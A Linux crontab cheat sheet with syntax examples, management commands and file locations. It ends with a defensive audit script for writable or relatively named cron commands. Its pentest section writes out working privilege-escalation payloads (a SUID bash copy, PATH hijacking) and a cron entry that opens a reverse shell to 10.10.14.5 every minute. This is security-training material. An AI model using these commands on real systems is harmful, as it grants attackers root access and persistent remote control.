Crontab Cheat Sheet
Cron syntax reference and commands for scheduling jobs on Linux — plus persistence and privesc angles for pentesters.
Overview
Cron runs commands on a schedule. The five-field time syntax trips everyone up, so this sheet pins it down with examples. For security work, cron is both a persistence mechanism and a privesc target—writable scripts run by root cron are a classic escalation path.
Authorized use only. Schedule jobs and test cron-based escalation only on systems you own or have permission to test.
The five fields
minute(0-59) hour(0-23) day-of-month(1-31) month(1-12) day-of-week(0-7)
* * * * * command
Every 5 minutes
*/5 * * * *
Every hour on the hour
0 * * * *
Every day at 02:00
0 2 * * *
09:00 on weekdays (Mon-Fri)
0 9 * * 1-5
Midnight on the 1st of each month
0 0 1 * *
Shortcuts & ranges
Run once at startup (handy for persistence)
@reboot command
Named schedules
@daily / @hourly / @weekly
Lists: at :00 and :30
0,30 * * * *
Ranges: every hour from 09:00 to 17:00
0 9-17 * * *
Steps: every 6 hours
0 */6 * * *
Managing crontabs
Edit your user's crontab
crontab -e
List your cron jobs
crontab -l
Remove all your cron jobs (careful!)
crontab -r
View another user's crontab (as root)
crontab -u www-data -l
Check the cron daemon is running
sudo systemctl status cron
Where cron jobs live
System-wide crontab (has a user field)
cat /etc/crontab
Drop-in system cron files
ls -la /etc/cron.d/
Scripts run on those schedules
ls -la /etc/cron.{hourly,daily,weekly,monthly}/
Per-user crontabs (root-only read)
ls -la /var/spool/cron/crontabs/
Pentest angle: privesc & persistence
Find cron jobs that run scripts you can write to
cat /etc/crontab; ls -la /etc/cron.*; grep -R . /etc/cron* 2>/dev/null
If a root cron runs a writable script, append a payload
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /path/writable-cron-script.sh
PATH abuse: cron uses a limited PATH — plant a binary if a relative name is called
echo -e '#!/bin/bash\nchmod +s /bin/bash' > /writable-path/scriptname; chmod +x /writable-path/scriptname
Persistence: a reverse shell every minute
(crontab -l 2>/dev/null; echo '* * * * * bash -c "bash -i >& /dev/tcp/10.10.14.5/443 0>&1"') | crontab -
Tips
- Cron runs with a minimal environment — always use absolute paths in jobs.
- Redirect output (>> /tmp/job.log 2>&1) to debug jobs that 'silently' don't run.
- % in a crontab command is special (newline) — escape it as \% or quote it.
- For privesc, the prize is any root-owned cron that executes a file or PATH entry you can modify.
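Hardening check for the last tip, as an added example that is not part of the original cheat sheet: a read-only audit that reads a system-format crontab and reports commands called by relative name, plus command files or their directories that are group- or world-writable. The function names, output labels and the demo's job names are made up for illustration.

```sh
#!/bin/sh
# Added example (not from the original page): read-only audit of system-format
# crontab entries (schedule, user, command), as in /etc/crontab and /etc/cron.d/*.
# Heuristic: only the first word of each command is inspected.

# loose_perms PATH: true if PATH is group- or world-writable
loose_perms() {
    [ -n "$(find "$1" -prune \( -perm -0020 -o -perm -0002 \) -print 2>/dev/null)" ]
}

# audit_cron_file FILE: print one finding per risky entry
audit_cron_file() {
    file=$1
    while IFS= read -r line; do
        set -f; set -- $line; set +f          # split into fields without globbing "*"
        case "${1:-}" in
            ''|'#'*|*=*) continue ;;          # blank, comment, or VAR=value line
            @*) [ $# -ge 3 ] || continue; user=$2; cmd=$3 ;;   # @reboot, @daily, ...
            *)  [ $# -ge 7 ] || continue; user=$6; cmd=$7 ;;   # five time fields
        esac
        case "$cmd" in
            /*) ;;                            # absolute path: check permissions below
            *)  echo "RELATIVE user=$user cmd=$cmd"; continue ;;  # resolved via PATH
        esac
        dir=${cmd%/*}; dir=${dir:-/}
        if loose_perms "$cmd"; then echo "WRITABLE-FILE user=$user path=$cmd"; fi
        if loose_perms "$dir"; then echo "WRITABLE-DIR user=$user path=$dir"; fi
    done < "$file"
}

# demo: constructed sample (temp dir, made-up job names) so the audit runs offline
demo() {
    d=$(mktemp -d) || return 1
    printf '#!/bin/sh\n' > "$d/backup.sh"; chmod 777 "$d/backup.sh"   # weak
    printf '#!/bin/sh\n' > "$d/rotate.sh"; chmod 755 "$d/rotate.sh"   # fine
    cat > "$d/crontab" <<EOF
PATH=/usr/local/bin:/usr/bin
# constructed entries
*/5 * * * * root $d/backup.sh
0 2 * * * root $d/rotate.sh >> /var/log/rotate.log 2>&1
@reboot root cleanup-tmp
EOF
    audit_cron_file "$d/crontab"
    rm -rf "$d"
}

if [ "${1:-}" = "--demo" ]; then demo; fi
```

On a real host, run `audit_cron_file` over /etc/crontab and each file in /etc/cron.d/; per-user crontabs have no user field and need the field offsets shifted by one.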